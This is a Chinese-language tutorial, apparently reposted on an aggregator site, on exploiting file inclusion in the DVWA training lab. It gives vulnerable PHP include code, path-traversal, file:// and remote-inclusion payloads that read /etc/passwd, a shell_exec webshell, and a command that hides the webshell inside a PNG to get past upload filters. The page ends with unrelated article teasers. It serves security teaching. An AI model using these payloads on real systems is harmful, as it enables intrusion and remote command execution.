web漏洞之文件包含漏洞

一、文件包含漏洞

1、把DVWA頁面改為low級別,然后點擊File Inclusion頁面

文件包含漏洞有四種include()/require()/include_once()/require_once()
常見的文件包含漏洞代碼如下
<?php$file=$_GET['filename'];     filename隨意定義include($file);
?>
-----------------------------------------
<?phpinclude $_GET['test'];       test隨意定義
?>
------------------------------------------
原理是當訪問一個包含文件包含漏洞的php頁面時,比如DVWA的File Inclusion頁面訪問的是low.php和include.php,這兩個頁面包含了include($_GET['page'])這句話,意思是page會把用戶輸入的參數帶進來然后由$_GET讀取,最后交給include()函數把傳參轉換成php語言執行,比如用戶輸入http://dvwa/include.php/?page=../../webshell.php就等于 include(../../webshell.php),只要訪問的php頁面包含include($_GET['page'])就可以進行文件包含漏洞滲透操作。include($_GET['page']) 中的page可以隨便定義只要和用戶輸入的page保持一致即可
?page=../../ 或 ?page=/etc/passwd 都屬于相對路徑,意思是從當前目錄開始查看
?page=file:///etc/passwd 通過file://的方式屬于絕對路徑
?page=http://                   通過http://遠程執行php文件屬于遠程文件包含漏洞
-----------------------------------------------------------------------
(1) 先上傳一個webshell.php文件到file upload頁面(2) 然后在file inclusion頁面訪問如下url執行這個webshell.php文件http://192.168.1.107/DVWA/vulnerabilities/fi/?page=../../hackable/uploads/webshell.php或http://192.168.1.107/DVWA/vulnerabilities/fi/?page=../../../../../../etc/passwd也可以使用絕對路徑http://192.168.1.107/DVWA/vulnerabilities/fi/?page=file:///etc/passwd或使用http://http://192.168.1.107/DVWA/vulnerabilities/fi/?page=http://192.168.1.107/DVWA/hackable/uploads/webshell.php(3) 如果網站不允許上傳.php文件可以把webshell嵌入到圖片中執行cat 1.png webshell.php > 2.pnghttp://192.168.1.107/DVWA/vulnerabilities/fi/?page=../../hackable/uploads/2.png

2、如果把dvwa的級別提高到High,那么再上傳webshell.php就會失敗,此時就只能上傳png/jpg文件才可以

(1) 先準備好2.png圖片然后把webshell.php的代碼植入到3.png圖片中
webshell:
<?php echo shell_exec("df"); ?>
windows:
Copy b/ 2.png+webshell.php 3.png   
mac/linux:順序不要搞反了
cat 2.png webshell.php > 3.png(2) 上傳3.png到DVWA
訪問3.png正常顯示圖片:
http://192.168.1.107/DVWA/hackable/uploads/3.png(3) 利用文件包含漏洞進行滲透(需要提前知道你上傳圖片的路徑)
http://192.168.1.107/DVWA/vulnerabilities/fi/?page=file:///var/www/html/DVWA/hackable/uploads/3.png
DVWA為了方便用戶學習會主動句提供文件包含漏洞模塊fi/?page=來幫助用戶學習
或者
http://192.168.1.107/DVWA/vulnerabilities/fi/?page=file:///etc/passwd
file://: 表示系統文件的絕對路徑,這里只能用絕對路徑因為級別是High

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/web/65293.shtml
繁體地址,請注明出處:http://hk.pswp.cn/web/65293.shtml
英文地址,請注明出處:http://en.pswp.cn/web/65293.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

小程序與物聯網(IoT)融合:開啟智能生活新篇章

小程序與物聯網(IoT)融合:開啟智能生活新篇章

一、引言 隨著移動互聯網技術的飛速發展&#xff0c;小程序作為一種輕量級的應用形式&#xff0c;憑借其無需下載安裝、即用即走的特點&#xff0c;迅速滲透到人們生活的各個領域。與此同時&#xff0c;物聯網&#xff08;IoT&#xff09;技術也在不斷進步&#xff0c;將各種物…
閱讀更多...
Ubuntu無法創建python venv環境

Ubuntu無法創建python venv環境

排查步驟如下 1. python3 -m venv venv he virtual environment was not created successfully because ensurepip is not available. On Debian/Ubuntu systems, you need to install the python3-venv package using the following command.apt install python3.8-venvYou…
閱讀更多...
如何很快將文件轉換成另外一種編碼格式?編碼?按指定編碼格式編譯?如何檢測文件編碼格式?Java .class文件編碼和JVM運行期內存編碼?

如何很快將文件轉換成另外一種編碼格式?編碼?按指定編碼格式編譯?如何檢測文件編碼格式?Java .class文件編碼和JVM運行期內存編碼?

如何很快將文件轉換成另外一種編碼格式? 利用VS Code右下角的"選擇編碼"功能&#xff0c;選擇"通過編碼保存"可以很方便將文件轉換成另外一種編碼格式。尤其&#xff0c;在測試w/ BOM或w/o BOM, 或者ANSI編碼和UTF編碼轉換&#xff0c;特別方便。VS文件另…
閱讀更多...
PCL點云庫入門——PCL庫點云特征之PFH點特征直方圖(Point Feature Histograms -PHF)

PCL點云庫入門——PCL庫點云特征之PFH點特征直方圖(Point Feature Histograms -PHF)

1、算法原理 PFH點&#xff08;Point Feature Histogram&#xff09;特征直方圖的原理涉及利用參數化查詢點與鄰域點之間的空間差異&#xff0c;并構建一個多維直方圖以捕捉點的k鄰域幾何屬性。這個高維超空間為特征表示提供了一個可度量的信息空間&#xff0c;對于點云對應曲面…
閱讀更多...
5. CSS引入方式

5. CSS引入方式

5.1 CSS的三種樣式 按照 CSS 樣式書寫的位置(或者引入的方式)&#xff0c;CSS樣式表可以分為三大類&#xff1a; 1.行內樣式表&#xff08;行內式&#xff09; 2.內部樣式表&#xff08;嵌入式&#xff09; 3. 外部樣式表&#xff08;鏈接式&#xff09; 5.2 內部樣式表 …
閱讀更多...
為什么ip屬地一會河南一會江蘇

為什么ip屬地一會河南一會江蘇

在使用互聯網的過程中&#xff0c;許多用戶可能會遇到這樣一個問題&#xff1a;自己的IP屬地一會兒顯示為河南&#xff0c;一會兒又變成了江蘇。這種現象可能會讓人感到困惑&#xff0c;甚至產生疑慮&#xff0c;擔心自己的網絡活動是否受到了某種影響。為了解答這一疑問&#…
閱讀更多...
unity3d-搞個場景漫游如何實現Alpha

unity3d-搞個場景漫游如何實現Alpha

要處理兩個問題&#xff1a; 如何設置地面人不掉下去 方法一、 游戲物體加剛體&#xff0c;將游戲物體和地面加collider。如果是地形&#xff0c;可以使用 Terrain Collider&#xff1b;如果是簡單的平面&#xff0c;可以添加 Box Collider 或者 Mesh Collider&#xff08;如果…
閱讀更多...
git merge rebase

git merge rebase

merge操作 Git自己分支合并dev分支 rebase 操作 git rebase
閱讀更多...
doris 2.1 temporay partition 測試及總結

doris 2.1 temporay partition 測試及總結

測試步驟 創建表 drop table order_info_shuffle; CREATE TABLE order_info_shuffle ( order_id varchar(20), user_id varchar(20), goods_id
閱讀更多...
jmeter性能測試例子

jmeter性能測試例子

目錄 一、介紹 二、操作例子 設置線程數 添加同步定時器 添加聚合報告 一、介紹 在軟件測試中&#xff0c;一般用jmeter來對接口做性能測試&#xff0c;對對接口進行一個壓力的測試。 簡述&#xff1a; 在接口的線程中設置線程的數量和時間&#xff0c;添加一個定時器…
閱讀更多...
C# 設計模式(行為型模式):解釋器模式

C# 設計模式(行為型模式):解釋器模式

C# 設計模式&#xff08;行為型模式&#xff09;&#xff1a;解釋器模式 (Interpreter Pattern) 什么是解釋器模式&#xff1f; 解釋器模式&#xff08;Interpreter Pattern&#xff09;是一種行為型設計模式&#xff0c;用于定義一種語言的語法表示&#xff0c;并提供一個解釋…
閱讀更多...
ubuntu16 重啟之后lvm信息丟失故障恢復

ubuntu16 重啟之后lvm信息丟失故障恢復

一、背景 1、問題背景 業務有一臺物理開發服務器&#xff0c;文件系統有損壞&#xff1b;由于重啟時沒有檢查&#xff0c;導致重啟卡住。后面通過斷電重新啟動之后&#xff0c;無法進入系統&#xff1b;進入救援模式&#xff0c;注釋數據盤掛載。重啟之后進入系統&#xff0c…
閱讀更多...
React函數組件中與生命周期相關Hooks詳解

React函數組件中與生命周期相關Hooks詳解

React 函數組件及其鉤子渲染流程是 React 框架中的核心概念之一。以下是對該流程的詳細解析&#xff1a; 一、React 函數組件基礎 定義&#xff1a; React 函數組件是一個接收 props 作為參數并返回 React 元素的函數。它們通常用于表示 UI 的一部分&#xff0c;并且不保留內部…
閱讀更多...
水一篇水水水

水一篇水水水

為了拿推廣卷&#xff0c;但不想把我原本完整的文章拆成零散的多篇&#xff0c;只能出此下策隨便發一篇&#xff0c;認真寫的都筆記專欄里 網絡是由若干節點和連接這些節點的鏈路構成&#xff0c;表示諸多對象及其相互聯系。 在1999年之前&#xff0c;人們一般認為網絡的結構都…
閱讀更多...
PDFelement 特別版

PDFelement 特別版

Wondershare PDFelement Pro 是一款非常強大的PDF編輯軟件&#xff0c;它允許用戶輕松地編輯、轉換、創建和管理PDF文件。這個中文特別版的軟件具有許多令人印象深刻的功能&#xff0c;PDFelement Pro 提供了豐富的編輯功能&#xff0c;可以幫助用戶直接在PDF文件中添加、刪除、…
閱讀更多...
C語言的正則表達式

C語言的正則表達式

C語言中的正則表達式 引言 正則表達式是一種用于描述字符串模式的工具&#xff0c;它可以用來進行字符串匹配、查找、替換等操作。在編程中&#xff0c;正則表達式被廣泛應用于數據驗證、信息提取等場景。C語言雖然沒有內置的正則表達式支持&#xff0c;但通過一些庫我們同樣…
閱讀更多...
【OpenCV】使用Python和OpenCV實現火焰檢測

【OpenCV】使用Python和OpenCV實現火焰檢測

1、 項目源碼和結構&#xff08;轉&#xff09; https://github.com/mushfiq1998/fire-detection-python-opencv 2、 運行環境 # 安裝playsound&#xff1a;用于播放報警聲音 pip install playsound # 安裝opencv-python&#xff1a;cv2用于圖像和視頻處理&#xff0c;特別是…
閱讀更多...
GO隨想:GO的并發等待

GO隨想:GO的并發等待

協程并發等待技術——WaitGroup 類型和 errgroup 包 waitgroup 阻塞等待多個并發任務執行完成。WaitGroup 類型主要包含下面幾個方法。 func (wg *WaitGroup) Add(delta int) func (wg *WaitGroup) Done() func (wg *WaitGroup) Wait() 第一個是 Add 方法&#xff0c;在任務運…
閱讀更多...
深入理解Mybatis原理》MyBatis的sqlSessi

深入理解Mybatis原理》MyBatis的sqlSessi

sqlSessionFactory 與 SqlSession 正如其名&#xff0c;Sqlsession對應著一次數據庫會話。由于數據庫會話不是永久的&#xff0c;因此Sqlsession的生命周期也不應該是永久的&#xff0c;相反&#xff0c;在你每次訪問數據庫時都需要創建它&#xff08;當然并不是說在Sqlsession…
閱讀更多...
《HarmonyOS第一課》煥新升級,賦能開發者快速掌握鴻蒙應用開發

《HarmonyOS第一課》煥新升級,賦能開發者快速掌握鴻蒙應用開發

隨著HarmonyOS NEXT發布&#xff0c;鴻蒙生態日益壯大&#xff0c;廣大開發者對于系統化學習平臺和課程的需求愈發強烈。近日&#xff0c;華為精心打造的《HarmonyOS第一課》全新上線&#xff0c;集“學、練、考”于一體&#xff0c;憑借多維融合的教學模式與系統課程設置&…
閱讀更多...
最新文章

Copyright @ 2022~2023